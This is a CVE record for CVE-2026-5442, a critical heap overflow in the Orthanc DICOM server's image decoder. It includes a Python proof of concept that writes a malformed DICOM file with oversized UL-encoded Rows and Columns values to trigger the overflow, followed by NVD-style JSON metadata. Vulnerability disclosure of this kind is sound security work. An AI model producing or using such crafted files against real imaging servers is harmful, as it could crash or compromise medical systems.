CVE-2026-5442

# This is a conceptual PoC to demonstrate the vulnerability trigger. # It constructs a malformed DICOM file with VR UL (Unsigned Long) # instead of VR US (Unsigned Short) for dimension fields. import struct def create_malformed_dicom(filename): # Minimal DICOM preamble and prefix preamble = b'\x00' * 128 prefix = b'DICM' # File Meta Information Group Length (Tag: (0002,0000)) # Using VR UL (Unsigned Long) incorrectly for demonstration purposes, # though the bug specifically lies in image dimension parsing. fmi_group_len = struct.pack('<HHL', 0x0002, 0x0000, 0x00000004) + b'UL' + struct.pack('<L', 100) # Transfer Syntax UID (Tag: (0002,0010)) ts_uid = struct.pack('<HH', 0x0002, 0x0010) + b'UI' + b'\x00\x00' + b'1.2.840.10008.1.2.1' # Dataset: Image Dimensions (Rows - Tag: (0028,0010)) # Vulnerability: Using 'UL' VR instead of 'US' # Setting a very large value to trigger integer overflow in size calculation large_dim = 0xFFFFFFFF rows_tag = struct.pack('<HH', 0x0028, 0x0010) rows_vr = b'UL' rows_len = struct.pack('<L', 4) rows_val = struct.pack('<L', large_dim) # Columns (Tag: (0028,0011)) - same technique cols_tag = struct.pack('<HH', 0x0028, 0x0011) cols_vr = b'UL' cols_len = struct.pack('<L', 4) cols_val = struct.pack('<L', large_dim) # Pixel Data (Tag: (7FE0,0010)) - Dummy data pixel_tag = struct.pack('<HH', 0x7FE0, 0x0010) pixel_vr = b'OB' pixel_len = struct.pack('<L', 0xFFFFFFFF) # Undefined length pixel_data = b'A' * 100 # Some padding with open(filename, 'wb') as f: f.write(preamble + prefix) f.write(fmi_group_len + ts_uid) f.write(rows_tag + rows_vr + rows_len + rows_val) f.write(cols_tag + cols_vr + cols_len + cols_val) f.write(pixel_tag + pixel_vr + pixel_len + pixel_data) print(f"[+] Malformed DICOM file created: {filename}") print(f"[+] This file attempts to trigger the buffer overflow via VR mismatch.") if __name__ == "__main__": create_malformed_dicom("exploit_dicom.dcm")

{"cve": {"id": "CVE-2026-5442", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:16.543", "lastModified": "2026-04-14T20:19:46.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap buffer overflow vulnerability exists in the DICOM image decoder. Dimension fields are encoded using Value Representation (VR) Unsigned Long (UL), instead of the expected VR Unsigned Short (US), which allows extremely large dimensions to be processed. This causes an integer overflow during frame size calculation and results in out-of-bounds memory access during image decoding."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orthanc-server:orthanc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12.11", "matchCriteriaId": "A259075D-8B77-4B04-BC42-3E5ABE9DFE1F"}]}]}], "references": [{"url": "https://kb.cert.org/vuls/id/536588", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.machinespirits.de/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.orthanc-server.com/", "source": "[email protected]", "tags": ["Product"]}]}}